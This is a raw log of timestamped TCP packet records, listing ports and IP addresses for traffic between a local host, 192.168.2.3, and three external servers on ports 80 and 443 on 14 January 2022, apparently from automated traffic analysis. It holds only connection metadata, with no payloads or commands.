Jan 14, 2022 13:49:32.877389908 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:32.877424002 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:32.877438068 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:32.877449989 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:32.877460957 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:32.877477884 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:32.877496004 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:32.877521992 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:32.877530098 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:32.877547979 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:32.877559900 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:32.877574921 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:32.877599955 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:32.877599955 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:32.877625942 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:32.877636909 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:32.877652884 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:32.877688885 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:32.919979095 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:33.030399084 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:33.088490963 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:33.088656902 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:36.399741888 CET	49744	80	192.168.2.3	208.95.112.1
Jan 14, 2022 13:49:36.429951906 CET	80	49744	208.95.112.1	192.168.2.3
Jan 14, 2022 13:49:36.430051088 CET	49744	80	192.168.2.3	208.95.112.1
Jan 14, 2022 13:49:36.431510925 CET	49744	80	192.168.2.3	208.95.112.1
Jan 14, 2022 13:49:36.461532116 CET	80	49744	208.95.112.1	192.168.2.3
Jan 14, 2022 13:49:36.530042887 CET	49744	80	192.168.2.3	208.95.112.1
Jan 14, 2022 13:49:36.576740980 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:36.970951080 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:36.970993042 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:36.971093893 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.000205994 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.000252008 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.040155888 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.040297031 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.043462992 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.043477058 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.043689013 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.249902964 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.249999046 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.479156971 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.521869898 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.670577049 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.670716047 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.670780897 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.670859098 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.670864105 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.670896053 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.670937061 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.670991898 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.671051979 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.671067953 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.671169996 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.671247005 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.671252012 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.671276093 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.671336889 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.671354055 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.671889067 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.671958923 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.671962023 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.671983957 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.672564983 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.672631025 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.672631979 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.672652006 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.672704935 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.673379898 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.673450947 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.673479080 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.674057961 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.674128056 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.674137115 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.674159050 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.674211979 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.674226999 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.674910069 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.674985886 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.675008059 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.675713062 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.675786018 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.675797939 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.675815105 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.676054001 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.685976028 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.686117887 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.686199903 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.686213970 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.686255932 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.686331987 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.686335087 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.686357021 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.686479092 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.686628103 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.686778069 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.686841011 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.686841965 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.686862946 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.686963081 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.687429905 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.687572956 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.687640905 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.687710047 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.687741995 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.688294888 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.688359022 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.688366890 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.688396931 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.688421011 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.689057112 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.689133883 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.689215899 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.689239025 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.689611912 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.691138983 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.691164017 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.691217899 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.691266060 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.691296101 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.691317081 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.691324949 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.691335917 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.691378117 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.701572895 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.701643944 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.701715946 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.701745987 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.701757908 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.701797009 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.703526020 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.703583002 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.703680038 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.703706026 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.704452991 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.705456018 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.705513954 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.705579042 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.705598116 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.705616951 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.705674887 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.706578970 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.706638098 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.706707954 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.706722975 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.706746101 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.706767082 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.707447052 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.707503080 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.707542896 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.707551956 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.707585096 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.707607031 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.708239079 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.708292961 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.708362103 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.708370924 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.708404064 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.708429098 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.717096090 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.717170000 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.717252970 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.717274904 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.717288017 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.717441082 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.717623949 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.717695951 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.717746973 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.717762947 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.717773914 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.717820883 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.718556881 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.718622923 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.718681097 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.718693972 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.718744040 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.718751907 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.719286919 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.719338894 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.719386101 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.719403982 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.719436884 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.719460011 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.720168114 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.720221996 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.720284939 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.720300913 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.720312119 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.720890045 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.720933914 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.720987082 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.721031904 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.721041918 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.721076965 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.721098900 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.721654892 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.721705914 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.721743107 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.721756935 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.721780062 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.721808910 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.721829891 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.722384930 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.722441912 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.722503901 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.722517014 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.722532034 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.722574949 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.723239899 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.723294020 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.723335981 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.723349094 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.723378897 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.723484039 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.723774910 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.723828077 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.723913908 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.723922014 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.723963022 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.723968983 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.724364042 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.724421024 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.724473953 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.724481106 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.724510908 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.724535942 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.725050926 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.725102901 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.725142002 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.725148916 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.725183964 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.725200891 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.725465059 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.725516081 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.725549936 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.725562096 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.725594997 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.725624084 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.726185083 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.726242065 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.726299047 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.726313114 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.726320982 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.727114916 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.733062029 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.733108044 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.733236074 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.733263016 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.733285904 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.733344078 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.733359098 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.733391047 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.733408928 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.733426094 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.733468056 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.733566999 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.733611107 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.733688116 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.733722925 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.733747959 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.733763933 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.733810902 CET	443	49745	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:37.733814001 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.735286951 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:37.737693071 CET	49745	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.330461979 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.330504894 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.330607891 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.330993891 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.331008911 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.365869045 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.370758057 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.413882971 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.586292982 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.586396933 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.586440086 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.586484909 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.586525917 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.586538076 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.586587906 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.586608887 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.586663961 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.586673975 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.586688042 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.586739063 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.586756945 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.586770058 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.587274075 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.587286949 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.587528944 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.587568998 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.587655067 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.587667942 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.587727070 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.588268042 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.588345051 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.588453054 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.588464975 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.589126110 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.589165926 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.589217901 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.589231014 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.589328051 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.589819908 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.589910030 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.589992046 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.590007067 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.590722084 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.590821028 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.590831041 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.591428041 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.591471910 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.591507912 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.591521978 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.591573954 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.601733923 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.601792097 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.601866007 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.601958990 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.601988077 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.602013111 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.602020025 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.602041960 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.602154970 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.602847099 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.602885008 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.602910042 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.602989912 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.603003979 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.603055954 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.603601933 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.603630066 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.603701115 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.603710890 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.603805065 CET	49746	443	192.168.2.3	185.199.108.133
Jan 14, 2022 13:49:38.604399920 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.604439020 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.604464054 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.604531050 CET	443	49746	185.199.108.133	192.168.2.3
Jan 14, 2022 13:49:38.604585886 CET	49746	443	192.168.2.3	185.199.108.133
